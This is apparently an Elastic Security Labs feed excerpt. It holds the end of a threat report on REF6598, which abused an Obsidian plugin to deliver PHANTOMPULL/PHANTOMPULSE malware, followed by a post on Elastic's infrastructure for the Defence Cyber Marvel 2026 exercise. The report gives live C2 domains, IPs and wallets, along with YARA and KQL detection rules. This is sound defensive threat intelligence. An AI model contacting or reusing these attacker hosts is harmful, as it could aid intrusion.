<p>The domain <code>fefea22134[.]net</code> resolves to Cloudflare IPs (<code>104.21.79[.]142</code> and <code>172.67.146[.]15</code>), indicating the C2 panel sits behind Cloudflare's proxy. Historical passive DNS shows the domain was first resolved on 2026-03-12, with earlier resolutions pointing to different IPs (<code>188.114.97[.]1</code> and <code>188.114.96[.]1</code>) on 2026-03-20.</p>
<p>The domain uses a Let's Encrypt certificate first observed on 2026-03-12:</p>
<ul>
<li><strong>Serial</strong>: <code>5130b76e63cd41f11e6b7c2a77f203f72b4</code></li>
<li><strong>Thumbprint</strong>: <code>6c0a1da746438d68f6c4ffbf9a10e873f3cf0499</code></li>
<li><strong>Validity</strong>: <code>2026-02-19 to 2026-05-20</code></li>
</ul>
<p>The certificate issuance date (Feb 19) aligns with the most recent blockchain C2 rotation transaction encoding <code>panel.fefea22134[.]net</code>, suggesting the infrastructure was provisioned the same day the C2 URL was published on-chain.</p>
<h2>Conclusion</h2>
<p>REF6598 demonstrates how threat actors continue to find creative initial access vectors by abusing trusted applications and employing targeted social engineering. By abusing Obsidian's community plugin ecosystem rather than exploiting a software vulnerability, the attackers bypass traditional security controls entirely, relying on the application's intended functionality to execute arbitrary code.</p>
<p>In the observed intrusion, <a href="https://www.elastic.co/security/endpoint-security">Elastic Defend</a> detected and blocked the attack chain at the early stage before PHANTOMPULSE could execute, preventing the threat actor from achieving their objectives. The behavioral protections triggered on the anomalous process execution originating from Obsidian, stopping the payload delivery in its tracks.</p>
<p>Organizations in the financial and cryptocurrency sectors should be aware that legitimate productivity tools can be turned into attack vectors. Defenders should monitor for anomalous child process creation from applications like Obsidian and enforce application-level plugin policies where possible. The indicators and detection logic provided in this research can be used to identify and respond to this activity.</p>
<p>Elastic Security Labs will continue to monitor REF6598 for further developments, including additional macOS payloads once the associated C2 infrastructure becomes active.</p>
<h4>MITRE ATT&amp;CK</h4>
<p>Elastic uses the <a href="https://attack.mitre.org/">MITRE ATT&amp;CK</a> framework to document common tactics, techniques, and procedures that advanced persistent threats use against enterprise networks.</p>
<h5>Tactics</h5>
<p>Tactics represent the why of a technique or sub-technique. It is the adversary’s tactical goal: the reason for performing an action.</p>
<ul>
<li><a href="https://attack.mitre.org/tactics/TA0001/">Initial Access</a></li>
<li><a href="https://attack.mitre.org/tactics/TA0002/">Execution</a></li>
<li><a href="https://attack.mitre.org/tactics/TA0003/">Persistence</a></li>
<li><a href="https://attack.mitre.org/tactics/TA0004/">Privilege Escalation</a></li>
<li><a href="https://attack.mitre.org/tactics/TA0005/">Defense Evasion</a></li>
<li><a href="https://attack.mitre.org/tactics/TA0009/">Collection</a></li>
<li><a href="https://attack.mitre.org/tactics/TA0007/">Discovery</a></li>
<li><a href="https://attack.mitre.org/tactics/TA0011/">Command and Control</a></li>
</ul>
<h5>Techniques</h5>
<p>Techniques represent how an adversary achieves a tactical goal by performing an action.</p>
<ul>
<li><a href="https://attack.mitre.org/techniques/T1566/003/">Phishing: Spearphishing via Service</a></li>
<li><a href="https://attack.mitre.org/techniques/T1204/002/">User Execution: Malicious File</a></li>
<li><a href="https://attack.mitre.org/techniques/T1059/001/">Command and Scripting Interpreter: PowerShell</a></li>
<li><a href="https://attack.mitre.org/techniques/T1059/002/">Command and Scripting Interpreter: AppleScript</a></li>
<li><a href="https://attack.mitre.org/techniques/T1140/">Deobfuscate/Decode Files or Information</a></li>
<li><a href="https://attack.mitre.org/techniques/T1620/">Reflective Code Loading</a></li>
<li><a href="https://attack.mitre.org/techniques/T1497/003/">Virtualization/Sandbox Evasion: Time Based Evasion</a></li>
<li><a href="https://attack.mitre.org/techniques/T1055/">Process Injection</a></li>
<li><a href="https://attack.mitre.org/techniques/T1053/005/">Scheduled Task/Job: Scheduled Task</a></li>
<li><a href="https://attack.mitre.org/techniques/T1547/011/">Boot or Logon Autostart Execution: Plist Modification</a></li>
<li><a href="https://attack.mitre.org/techniques/T1056/001/">Input Capture: Keylogging</a></li>
<li><a href="https://attack.mitre.org/techniques/T1113/">Screen Capture</a></li>
<li><a href="https://attack.mitre.org/techniques/T1082/">System Information Discovery</a></li>
<li><a href="https://attack.mitre.org/techniques/T1548/002/">Abuse Elevation Control Mechanism: Bypass UAC</a></li>
</ul>
<h3>Detecting REF6598</h3>
<h4>Detection</h4>
<p>The following detection rules and behavior prevention events were observed throughout the analysis of this intrusion set:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/ff73f1344671a50945c40c45af0ae0b6fc2ed840/rules/windows/execution_windows_powershell_susp_args.toml#L27">Suspicious Windows Powershell Arguments</a></li>
</ul>
<h4>Prevention</h4>
<ul>
<li><a href="https://github.com/elastic/protections-artifacts/blob/c28c16baea1b0c9d2ebc63dfc1880635890fd91e/behavior/rules/windows/execution_suspicious_powershell_execution.toml#L8">Suspicious PowerShell Execution</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/c28c16baea1b0c9d2ebc63dfc1880635890fd91e/behavior/rules/windows/defense_evasion_network_module_loaded_from_suspicious_unbacked_memory.toml">Network Module Loaded from Suspicious Unbacked Memory</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/c28c16baea1b0c9d2ebc63dfc1880635890fd91e/behavior/rules/macos/defense_evasion_base64_encoded_string_execution_via_osascript.toml">Base64 Encoded String Execution via Osascript</a></li>
</ul>
<h4>Hunting queries in Elastic</h4>
<p>These hunting queries are used to identify the presence of the Obsidian community shell command plugin as well as the resulting command execution :</p>
<h5>KQL</h5>
<pre><code>event.category : file and process.name : (Obsidian or Obsidian.exe) and
 file.path : *obsidian-shellcommands*
</code></pre>
<pre><code>event.category : process and event.type : start and
 process.name : (sh or bash or zsh or powershell.exe or cmd.exe) and 
 process.parent.name : (Obsidian.exe or Obsidian)
</code></pre>
<h5>YARA</h5>
<p>Elastic Security has created YARA rules to identify this activity. Below are YARA rules to identify the <strong>PHANTOMPULL</strong> and <strong>PHANTOMPULSE</strong></p>
<pre><code>rule Windows_Trojan_PhantomPull {
    meta:
        author = &quot;Elastic Security&quot;
        os = &quot;Windows&quot;
        category_type = &quot;Trojan&quot;
        family = &quot;PhantomPull&quot;
        threat_name = &quot;Windows.Trojan.PhantomPull&quot;
        reference_sample = &quot;70bbb38b70fd836d66e8166ec27be9aa8535b3876596fc80c45e3de4ce327980&quot;

    strings:
        $GetTickCount = { 48 83 C4 80 FF 15 ?? ?? ?? ?? 83 F8 FE 75 }
        $djb2 = { 45 8B 0C 83 41 BA A7 C6 67 4E 49 01 C9 45 8A 01 }
        $mutex = { 48 89 EB 83 E3 ?? 45 8A 2C 1C 45 32 2C 2E 45 0F B6 FD }
        $str_decrypt = { 39 C2 7E ?? 49 89 C1 41 83 E1 ?? 47 8A 1C 0A 44 32 1C 01 45 88 1C 00 48 FF C0 }
        $payload_decrypt = { 4C 89 C8 83 E0 0F 41 8A 14 02 43 30 14 0F 49 FF C1 44 39 CB }
        $url = &quot;/v1/updates/check?build=payloads&quot; ascii fullword
    condition:
        3 of them
}

</code></pre>
<pre><code>rule Windows_Trojan_PhantomPulse {
    meta:
        author = &quot;Elastic Security&quot;
        os = &quot;Windows&quot;
        category_type = &quot;Trojan&quot;
        family = &quot;PhantomPulse&quot;
        threat_name = &quot;Windows.Trojan.PhantomPulse&quot;
        reference_sample = &quot;9e3890d43366faec26523edaf91712640056ea2481cdefe2f5dfa6b2b642085d&quot;

    strings:
        $a = &quot;[UNINSTALL 2/6] Removing Scheduled Task...&quot; fullword
        $b = &quot;PhantomInject: host PID=%lu&quot; fullword
        $c = &quot;inject: shellcode detected -&gt; InjectShellcodePhantom&quot; fullword
        $d = &quot;inject: shellcode detected, using phantom section hijack&quot; fullword
    condition:
        all of them
}
</code></pre>
<h3>Observations</h3>
<p>The following observables were discussed in this research.</p>
<table>
<thead>
<tr>
<th>Observable</th>
<th>Type</th>
<th>Name</th>
<th>Reference</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>70bbb38b70fd836d66e8166ec27be9aa8535b3876596fc80c45e3de4ce327980</code></td>
<td>SHA-256</td>
<td><code>syncobs.exe</code></td>
<td>PHANTOMPULL loader</td>
</tr>
<tr>
<td><code>33dacf9f854f636216e5062ca252df8e5bed652efd78b86512f5b868b11ee70f</code></td>
<td>SHA-256</td>
<td></td>
<td>PhantomPulse RAT (final payload)</td>
</tr>
<tr>
<td><code>195.3.222[.]251</code></td>
<td>ipv4-addr</td>
<td></td>
<td>Staging server (PowerShell script &amp; loader delivery)</td>
</tr>
<tr>
<td><code>panel.fefea22134[.]net</code></td>
<td>domain-name</td>
<td></td>
<td>PhantomPulse C2 panel</td>
</tr>
<tr>
<td><code>0x666[.]info</code></td>
<td>domain-name</td>
<td></td>
<td>macOS dropper C2 domain</td>
</tr>
<tr>
<td><code>t[.]me/ax03bot</code></td>
<td>url</td>
<td></td>
<td>macOS dropper Telegram fallback C2</td>
</tr>
<tr>
<td><code>0xc117688c530b660e15085bF3A2B664117d8672aA</code></td>
<td>crypto-wallet</td>
<td></td>
<td>Ethereum wallet for blockchain C2 resolution</td>
</tr>
<tr>
<td><code>0x38796B8479fDAE0A72e5E7e326c87a637D0Cbc0E</code></td>
<td>crypto-wallet</td>
<td></td>
<td>Funding wallet for C2 resolution wallet</td>
</tr>
<tr>
<td><code>thoroughly-publisher-troy-clara[.]trycloudflare[.]com</code></td>
<td>domain-name</td>
<td></td>
<td>Prior PhantomPulse C2 (Cloudflare Tunnel)</td>
</tr>
</tbody>
</table>]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/phantom-in-the-vault.webp" length="0" type="image/webp"/>
        </item>
        <item>
            <title><![CDATA[Elastic on Defence Cyber Marvel 2026: A Technical overview from the Exercise Floor]]></title>
            <link>https://www.elastic.co/security-labs/elastic-defence-cyber-marvel</link>
            <guid>elastic-defence-cyber-marvel</guid>
            <pubDate>Thu, 09 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[An overview of the Elastic Security and AI infrastructure deployed to support the UK Ministry of Defence's flagship cyber exercise, Defence Cyber Marvel 2026.]]></description>
            <content:encoded><![CDATA[<p><img src="https://www.elastic.co/security-labs/assets/images/elastic-defence-cyber-marvel/image1.png" alt="" /></p>
<p>Where to begin. For the fourth consecutive year, Elastic has had the privilege of serving as a trusted industry partner on Exercise Defence Cyber Marvel - the UK Ministry of Defence's flagship cyber exercise series. DCM26 was, without question, the most ambitious iteration yet, and we're chuffed to bits to finally be able to talk about what we built, how we built it, and what we learnt along the way.</p>
<h2>What is Defence Cyber Marvel?</h2>
<p>For those unfamiliar, Defence Cyber Marvel (DCM) is the largest UK military cyber exercise series that focuses on defending traditional IT networks, corporate environments, and complex industrial control systems in realistic, high-pressure scenarios. It showcases responsible cyber power whilst enhancing readiness, interoperability, and resilience across Defence and allied nations. Now in its fifth year, DCM has evolved from an Army Cyber Association initiative into a tri-service operation led by Cyber and Specialist Operations Command (CSOC).</p>
<p>The <a href="https://www.gov.uk/government/news/uk-to-lead-multinational-cyber-defence-exercise-from-singapore">UK Government published an official press release for DCM26</a>, which provides an excellent overview of the exercise's strategic importance. As the British High Commissioner to Singapore noted, the exercise demonstrates the deep cooperation between the UK and trusted partners, a reminder of the strength of shared strategic partnerships in an increasingly complex security landscape.</p>
<p>At its core, DCM is a force-on-force cyber exercise: defending Blue Teams protect their assigned networks and infrastructure from attacking Red Teams, using a range of techniques. Activities span changing default passwords and hardening firewalls through to deploying enterprise-grade, AI-powered cyber defence with <a href="https://www.elastic.co/security">Elastic Security</a>. The activities of each team are monitored by the White Team to establish a score factoring in system availability, attack detection, incident reporting, and system restoration.. It stretches the most experienced teams whilst also facilitating a unique training mechanism for junior teams on their first exposure to a cyber range, and that dual purpose is what makes DCM such a valuable exercise.</p>
<h2>The scale of DCM26</h2>
<p>DCM26 brought together over 2,500 personnel from 29 participating countries and 70 organisations, coordinated from a central Exercise Control (EXCON) based out of Singapore, with EXCON hosting over 600 participants. The exercise ran across a hybrid compute environment spanning the CR14 cyber range and AWS, hosting over 5,000 virtual systems.</p>
<p>The exercise itself ran for five days of execution (9–13 February 2026), preceded by optional instructor-led pre-training and connectivity checks. The scenario, built on the Defence Academy Training Environment (DATE) Indo-Pacific Operating Environment, placed teams as Cyber Protection Teams defending deployed military systems during an escalating regional crisis.Blue Teams were geographically dispersed,some in their home locations across the UK and internationally, others deployed overseas, all connecting into the range via VPN.</p>
<p>Participants included representatives from UK Defence, cross-government departments such as the National Crime Agency, the Department for Work and Pensions, the Cabinet Office, and the Department for Business and Trade, alongside international partners forming up to 40 teams. Following the success of last year's exercise in the Republic of Korea, Singapore served as the exercise hub for the first time, reflecting the UK's commitment to deepening cooperation with Indo-Pacific partners on shared security challenges.</p>
<p>In short, it's a serious exercise. High-pressure, force-on-force, with real consequences for scoring and real learning outcomes for every participant.</p>
<h2>The deployments: Our Elastic infrastructure</h2>
<p>This year's infrastructure represented a significant architectural evolution from previous iterations. Rather than deploying individual Elastic Cloud clusters per team, we moved to a single, space-based multi-tenanted Elastic Cloud deployment for the Blue Teams. We also provided deployments for functions outside of  the Blue Teams. Let me break down each deployment and why it exists.</p>
<h3>Blue Teams: Multi-tenanted Elastic Security</h3>
<p><img src="https://www.elastic.co/security-labs/assets/images/elastic-defence-cyber-marvel/image4.png" alt="" /></p>
<p>The centrepiece of our contribution was a single Elastic Cloud deployment serving all 40 defending Blue Teams, separated using Kibana Spaces and datastream namespaces. Each of the 39 teams had its own isolated workspace, including dashboards, agents, and detection rules.</p>
<p>Here's what the Terraform resource looked like for creating each team's space:</p>
<pre><code># Create 40 Blue Team spaces
resource &quot;elasticstack_kibana_space&quot; &quot;blue_team&quot; {
  count = var.team_count

  space_id    = local.space_ids[count.index]
  name        = &quot;Blue Team ${local.team_numbers[count.index]}&quot;
  description = &quot;Isolated space for BT-${local.team_numbers[count.index]} with space-aware Fleet visibility&quot;

  disabled_features = []
  color             = &quot;#0077CC&quot;
}
</code></pre>
<p>Each team's space got a dedicated set of three  <a href="https://www.elastic.co/docs/reference/fleet/agent-policy">Fleet</a> agent policies: on day 1a Deployed network policy, day 2, a Host Nation network policy, and finally a PacketCapture policy for network traffic monitoring. The phased access control was elegant in its simplicity: setting <code>enable_hostnation_network = true</code> in our <code>terraform.tfvars</code> and running <code>terraform apply</code> expanded each team's role permissions and made their Host Nation agent policy visible in their space. The exercise went from one network to two without a single manual click in Kibana.</p>
<p>The data isolation relied on datastream namespaces. Each agent policy is written to team-specific namespaces like <code>bt_01_deployed</code> and <code>bt_01_hostnation</code>, producing data streams following the pattern:</p>
<pre><code>logs-system.auth-bt_01_hostnation
logs-system.syslog-bt_01_hostnation
metrics-system.cpu-bt_01_hostnation
logs-endpoint.events.process-bt_01_hostnation
logs-windows.forwarded-bt_01_hostnation
logs-auditd.log-bt_01_hostnation
</code></pre>
<p>Each team's Kibana security role was then scoped to only those data streams using dynamic index privilege blocks:</p>
<pre><code># Deployed data streams (always granted)
indices {
  names = [
    &quot;logs-*-${local.deployed_namespaces[count.index]}&quot;,
    &quot;metrics-*-${local.deployed_namespaces[count.index]}&quot;,
    &quot;.fleet-*&quot;
  ]
  privileges = [&quot;read&quot;, &quot;view_index_metadata&quot;]
}

# HostNation data streams (conditional on enable_hostnation_network)
dynamic &quot;indices&quot; {
  for_each = var.enable_hostnation_network ? [1] : []
  content {
    names = [
      &quot;logs-*-${local.hostnation_namespaces[count.index]}&quot;,
      &quot;metrics-*-${local.hostnation_namespaces[count.index]}&quot;
    ]
    privileges = [&quot;read&quot;, &quot;view_index_metadata&quot;]
  }
}
</code></pre>
<p>Authentication was handled via Keycloak SSO, with Elasticsearch role mappings connecting Keycloak groups to Kibana roles:</p>
<pre><code>resource &quot;elasticstack_elasticsearch_security_role_mapping&quot; &quot;blue_team&quot; {
  count = var.team_count

  name    = &quot;bt-${local.team_numbers[count.index]}-keycloak-mapping&quot;
  enabled = true

  roles = [
    elasticstack_kibana_security_role.blue_team[count.index].name
  ]

  rules = jsonencode({
    field = {
      groups = &quot;${local.keycloak_groups[count.index]}&quot;
    }
  })
}
</code></pre>
<p>The default integration policies were simple by design. Each team received: System for core OS telemetry, Elastic Defend for Endpoint Detection and Response, Windows event forwarding, Auditd for Linux audit logging, and Network Packet Capture integrations. That's over 400 integration policies managed as code via the <a href="https://registry.terraform.io/providers/elastic/elasticstack/latest/docs">Elastic Stack Terraform Provider</a>.</p>
<p>A note on Elastic Defend: due to the effectiveness of Elastic's endpoint protection - which is trusted in production by the <a href="https://www.elastic.co/blog/defense-and-intelligence-community-endpoint-security">US DOD and IC, read more about that here</a> - and the fact that nobody in their right mind is burning zero-day exploits on a training exercise, we're forced tohandicap Elastic Defend by disabling Prevent mode, leaving it in Detect-only mode. Teams get alerts when something malicious happens, but with no automatic mitigation. We also completely disable Memory Threat Prevention and Detection as this discovers the majority of attacking team implants and beacons, which would rather spoil the game for the Red Teams. Toward the end of the exercise, we allowed the teams the freedom to use Elastic Defend to its full capability, but not before letting the Red Teams get a strong foothold.</p>
<p>We also pre-installed Elastic's <a href="https://www.elastic.co/docs/reference/security/prebuilt-rules">prebuilt detection rules</a> into each team space - the full set from Elastic Security Labs, continuously updated in an open repository. These rules were setup to ensure they only queried indices that the team's namespace-scoped permissions allowed, preventing any cross-team data leakage in detection rule execution.</p>
<p>Additionally, each team space had its Security Solution default index configured to scope detection rules to only that team's data streams, rather than the default broad pattern. This was handled by a Terraform <code>null_resource</code> that called the Kibana internal settings API to set <code>securitySolution:defaultIndex</code> for each space.</p>
<p>At peak, this deployment was ingesting 800,000 events per second (EPS) across all 40 teams. That's a serious amount of data, and the cluster handled it comfortably thanks to the autoscaling capabilities of Elastic Cloud. <a href="https://www.elastic.co/blog/monitoring-petabytes-of-logs-at-ebay-with-beats">That given, back in 2018 we were doing 5 million events per second with eBay.</a></p>
<p>Data lifecycle was managed by an Index Lifecycle Management (ILM) policy that rolled indices over after one day or <code>50</code> GB (whichever came first), moved them to a warm phase after two days for read-only optimisation and force-merging, and then deleted data after ten days. As a result, the storage costs were minimized while maintaining the exercise window requirements. Below is an example of how the ILM policy was implemented.</p>
<pre><code>resource &quot;elasticstack_elasticsearch_index_lifecycle&quot; &quot;dcm5_10day_retention&quot; {
  name = &quot;dcm5-10day-retention&quot;

  hot {
    min_age = &quot;0ms&quot;

    set_priority {
      priority = 100
    }

    rollover {
      max_age                = &quot;1d&quot;
      max_primary_shard_size = &quot;50gb&quot;
    }
  }

  warm {
    min_age = &quot;2d&quot;

    set_priority {
      priority = 50
    }

    readonly {}

    forcemerge {
      max_num_segments = 1
    }
  }

  delete {
    min_age = &quot;${var.data_retention_days}d&quot;

    delete {
      delete_searchable_snapshot = true
    }
  }
}
</code></pre>
<h3>The shard stress test: Proving multi-tenancy at scale</h3>
<p>Before committing to this architecture for a live military exercise, we needed to prove it would be able to meet our requirements and have an appropriate failover in place in the event of issues. Moving from individual deployments to a single multi-tenanted cluster introduced real risks: resource contention, ingest bottlenecks, data leakage across spaces due to misconfiguration, large TCP connection counts on the Elasticsearch nodes, and a significantly larger shard count since each team generates its own set of indices.</p>
<p>So we built a dedicated testing rig. The plan was straightforward: deploy 50 Kibana Spaces, create an agent policy in each space, launch 6,000 EC2 instances (120 per tenant, across six subnets in three availability zones), and load-test the lot. We monitored everything with AutoOps and Stack Monitoring.</p>
<p>The deployment flow worked like this: Terraform created the VPC and subnets across three availability zones, provisioned the 50 Kibana Spaces and their space-scoped Fleet policies, generated enrolment tokens, and then launched EC2 instances in batches. Each instance installed Elastic Agent on boot and enrolled against its space-specific token.</p>
<p>We hit some interesting challenges along the way. The standard Elastic Stack Terraform Provider didn't support space-aware Fleet operations at the time, so we forked it and added space ID handling to the Fleet resources - without that modification, every agent would have enrolled into the default space regardless of policy assignment. This wasn't the first time we'd had to extend the provider for an exercise; two years ago, for DCM2, we'd added the <code>elasticsearch_cluster_info</code> data source. Fortunately, the upstream provider has since added <code>support for space_ids</code> in version <code>0.12.2</code>.</p>
<p>We also ran into AWS EC2 API rate limits when trying to spin up all 6,000 instances simultaneously, so we batched deployments at 500 instances with five-minute cool-off periods between batches.</p>
<p>The results were reassuring. All 6,000 agents were typically enrolled within 20 minutes of deployment. In our tests, space isolation worked as expected with no observed data leakage between tenants. Fleet policy updates propagated to all agents within 60 seconds. Search queries scoped to individual spaces remained fast under full load. And the multi-AZ distribution proved resilient during simulated availability zone failures.</p>
<p>This testing gave us the confidence to commit to the architecture for the live exercise.</p>
<h3>Red Teams: C2 implant observability</h3>
<p><img src="https://www.elastic.co/security-labs/assets/images/elastic-defence-cyber-marvel/image3.png" alt="" /></p>
<p>A separate, dedicated Elastic deployment was stood up for the Red Teams, focused on Command and Control (C2) implant observability. This gave the attacking teams visibility into their own operations, including implant status, beacon callbacks, and operational progress, without any risk of cross-pollination with the Blue Team's data. The Red Teams used Tuoni as their C2, which is a framework developed by Clarified Security for red teaming. In DCM3, we worked with Clarified Security to ensure it properly supported the Elastic Common Schema, making future integration with Elastic much easier.</p>
<h3>NSOC: Exercise Network Security Operations Centre</h3>
<p><img src="https://www.elastic.co/security-labs/assets/images/elastic-defence-cyber-marvel/image6.png" alt="" /></p>
<p>The core exercise, Network Security Operations Centre (NSOC), ran on its own Elastic deployment, providing the exercise control staff with an overarching view of range health, security monitoring across the entire infrastructure, and critically, audit logging for all the AI services we deployed. Every <a href="https://www.elastic.co/docs/reference/integrations/aws_bedrock">Bedrock API invocation was logged in CloudWatch</a> and observable in this deployment, meaning the NSOC had complete visibility into what was being asked to the AI agents and by whom . More on this in the AI section below.</p>
<h2>Infrastructure automation: Terraform and Catapult</h2>
<p>Everything you've seen above was managed as Infrastructure as Code. Our <code>provider.tf</code> gives a sense of the provider ecosystem we were orchestrating:</p>
<pre><code>terraform {
  required_version = &quot;&gt;= 1.5&quot;

  required_providers {
    elasticstack = {
      source  = &quot;elastic/elasticstack&quot;
      version = &quot;~&gt; 0.13.1&quot;
    }
    aws = {
      source  = &quot;hashicorp/aws&quot;
      version = &quot;~&gt; 5.0&quot;
    }
    vault = {
      source  = &quot;hashicorp/vault&quot;
      version = &quot;~&gt; 3.20&quot;
    }
    cloudflare = {
      source  = &quot;cloudflare/cloudflare&quot;
      version = &quot;~&gt; 5.15.0&quot;
    }
  }

  backend &quot;s3&quot; {
    bucket  = &quot;elastic-terraform-state-dcm5&quot;
    key     = &quot;prod/terraform.tfstate&quot;
    region  = &quot;eu-west-2&quot;
    encrypt = true
  }
}
</code></pre>
<p>The total resource footprint managed by Terraform was substantial: one Elastic Cloud deployment with autoscaling, 40 Kibana Spaces, 120 Fleet agent policies (three per team), 400+ integration policies, 40 Kibana security roles, 40 Keycloak role mappings, ILM policies for data retention, 41 AWS IAM users for Bedrock GenAI connectors (one per team space plus a default), 41 Kibana GenAI action connectors, AWS Bedrock guardrails, Cloudflare Zero Trust tunnels for Tines access, Tines action connectors per team space, detection service accounts stored in HashiCorp Vault, and per-space Security Solution default index configuration. All state was stored in an encrypted S3 backend.</p>
<p>For the agent and proxy deployment onto the actual range systems, we used <a href="https://github.com/ClarifiedSecurity/catapult">Catapult</a>, an excellent open-source tool built by the team at Clarified Security. Catapult wraps Ansible with a container-based execution model that's purpose-built for cyber range deployments. It handled the installation and enrolment of Elastic Agents across the range infrastructure. The configuration of proxy servers (each team had a dedicated Squid proxy for its deployed network, this was to simulate a single point of egress as it would be in the real world. Traffic was routing through endpoints like <code>http://elastic-proxy.dsoc.XX.dcm.ex:3128</code>), and the deployment of Cloudflare tunnels for Tines connectivity.</p>
<p>During provisioning, the following were written to  HashiCorp Vault by Terraform and consumed by Catapult: Credentials, enrolment tokens, API keys, proxy configurations, Tines service account credentials.. The Vault paths followed a consistent structure like <code>dcm/gt/elastic/prod/enrollment_tokens/BT-XX-Deployed</code> and <code>dcm/gt/elastic/tines-sa/tines-sa-btXX</code>, making it straightforward for the Catapult playbooks to pull the right credentials for each team.</p>
<h2>Training: setting teams up for success</h2>
<p>Deploying the platform is one thing; ensuring people can actually use it is another. We provided on-range, instructor-led training to the Blue Teams during the pre-exercise phase. This covered <a href="https://github.com/ClarifiedSecurity/catapult">Elastic Security</a> fundamentals, navigating their team space in Kibana, working with the prebuilt detection rules, using Discover for log analysis and threat hunting, building custom dashboards, understanding Elastic Defend alerts, and getting familiar with the Timeline investigation tool.</p>
<p>The exercise instruction itself noted this training was optional but &quot;highly recommended,&quot; and from what we saw, the teams who attended absolutely hit the ground running on Day one of execution. Training and enablement are just as important as the technology deployment itself. Handing a team enterprise-grade security tooling which they don't know how to use would'nt have been helpful for anyone.</p>
<h2>The On-Range AI service: Compliant, audited, Guardrailed</h2>
<p>This year marked our debut in providing AI access to the DCM range. We provided a compliant AI service directly on the range, backed by UK-tenanted AWS Bedrock models - specifically Claude 3.7 Sonnet running in the eu-west-2 (London) region. This wasn't AI for the sake of AI; it was a carefully architected service with guardrails, complete audit logging, and RBAC-aware access controls. We were trusted with running this service due to Elastic's experience in the AI space.</p>
<p>The AI service had multiple consumers on the range, and this is an important distinction. The compliant Bedrock connector we provisioned into each team's space wasn't just powering our custom agents - it also powered Elastic's native AI features, specifically:</p>
<h3>Elastic AI Assistant for Security</h3>
<p>The <a href="https://www.elastic.co/docs/solutions/security/ai/ai-assistant">Elastic AI Assistant</a> was available in every Blue Team space, connected to our on-range Bedrock connector. This gave teams a context-aware chat interface directly within Elastic Security where they could ask questions about their alerts, get help writing ES|QL queries, investigate suspicious processes, and get guided remediation steps. The AI Assistant uses Retrieval-Augmented Generation (RAG) with Elastic's Knowledge Base feature, which is pre-populated with articles from <a href="https://www.elastic.co/security-labs">Elastic Security Labs</a>. Teams could also add their own documents, such as range-specific SOPs, threat intel, or team notes, to the Knowledge Base to further ground the assistant's responses in their operational context.</p>
<p>What made this particularly valuable in the exercise context was the AI Assistant's ability to help less experienced analysts understand what they were looking at. A junior analyst facing their first live implant beacon could ask the assistant to explain the alert, suggest investigation steps, and even help draft the incident report. The data anonymisation settings ensured that sensitive field values could be obfuscated before being sent to the LLM provider.</p>
<h3>Elastic Attack Discovery</h3>
<p><a href="https://www.elastic.co/docs/solutions/security/ai/attack-discovery">Attack Discovery</a> was another significant consumer of our on-range AI service. Attack Discovery uses LLMs to analyse alerts in a team's environment and identify threats by correlating alerts, behaviours, and attack paths. Each &quot;discovery&quot; represents a potential attack and describes relationships among multiple alerts - telling teams which users and hosts are involved, how alerts map to the <a href="https://www.elastic.co/docs/solutions/security/detect-and-alert/mitre-attack-coverage">MITRE ATT&amp;CK matrix</a>, and which threat actor might be responsible.</p>
<p>For a cyber exercise in which Red Teams actively launched coordinated attacks, Attack Discovery was transformative. Instead of manually triaging hundreds of individual alerts, Blue Teams could run Attack Discovery to surface the high-level attack narratives, for example, &quot;these 15 alerts are all part of a lateral movement chain from host X to host Y, likely by threat actor Z&quot;, and focus their investigation time where it mattered most. It's the kind of capability that directly reduces mean time to respond, and fights alert fatigue, which is precisely what you need when you're under sustained attack for five days straight.</p>
<h2>The custom AI agents: Elastic Agent Builder</h2>
<p>Beyond the native Elastic AI features, we built three bespoke AI agents using <a href="https://www.elastic.co/elasticsearch/agent-builder">Elastic Agent Builder</a>. Agent Builder is Elastic's framework for building custom AI agents that combine LLM instructions with modular, reusable tools, each tool being an ES|QL query, a built-in search capability, workflow execution, or an external integration via MCP. Agents parse natural language requests, select the appropriate tools, execute them, and iterate until they can provide a complete answer, all while managing context with data inside Elasticsearch. You can read more about the framework in the <a href="https://www.elastic.co/docs/explore-analyze/ai-features/elastic-agent-builder">Agent Builder documentation</a> and the <a href="https://www.elastic.co/search-labs/blog/elastic-ai-agent-builder-context-engineering-introduction">Elasticsearch Labs deep dive</a>.</p>
<p>The three key components of Agent Builder that we leveraged were:</p>
<p><strong>Agents:</strong> Custom LLM instructions and a set of assigned tools that define the agent's persona, capabilities, and behaviour boundaries. Each agent has a system prompt that controls its mission, the tools it can access, and the structure of its responses.</p>
<p><strong>Tools:</strong> Modular functions that agents use to search, retrieve, and manipulate Elasticsearch data. We built custom ES|QL tools that queried specific indices containing exercise documentation, playbooks, and reports.</p>
<p><strong>Agent Chat:</strong> The conversational interface - both the built-in Kibana UI and the programmatic API - that participants used to interact with the agents.</p>
<p>Agent and tool configurations are defined as JSON and managed via the Agent Builder APIs, making the entire agent lifecycle - from prompt engineering to tool binding - reproducible and version-controllable. We'll share the GrantPT agent configuration and tool definitions in a follow-up post for those who want to replicate this approach - watch this space.</p>
<p>Here's what each agent did:</p>
<h3>1. GrantPT - The general-purpose assistant</h3>
<p><img src="https://www.elastic.co/security-labs/assets/images/elastic-defence-cyber-marvel/image5.png" alt="" /></p>
<p>Available to all ~2,500 exercise participants, GrantPT was our primary AI agent and the best demonstration of how straightforward Agent Builder makes it to stand up a capable, domain-specific assistant. The agent's configuration consisted of a JSON object defining its system prompt, persona, and an array of bound tool IDs - that's it. No custom application code, no bespoke API layer, just declarative configuration.</p>
<p>What gave GrantPT its depth was the tooling. We defined a mix of built-in platform tools and custom ES|QL tools, each registered with a description, a parameterised query, and typed parameter definitions. For example, the knowledge base tool accepted a <code>target_index</code> and a semantic <code>query</code> parameter, executing a parameterised ES|QL query against our <code>dcm5-grantpt-*</code> indices with semantic search ranking:</p>
<pre><code>FROM dcm5-grantpt-* METADATA _score, _index
| WHERE _index == ?target_index
| WHERE content: ?query
| SORT _score DESC
| LIMIT 10
</code></pre>
<p>A separate index discovery tool let the agent dynamically enumerate available knowledge base indices at the start of each conversation, meaning we could add new documentation indices during the exercise without reconfiguring the agent; it would simply discover them on the next interaction.</p>
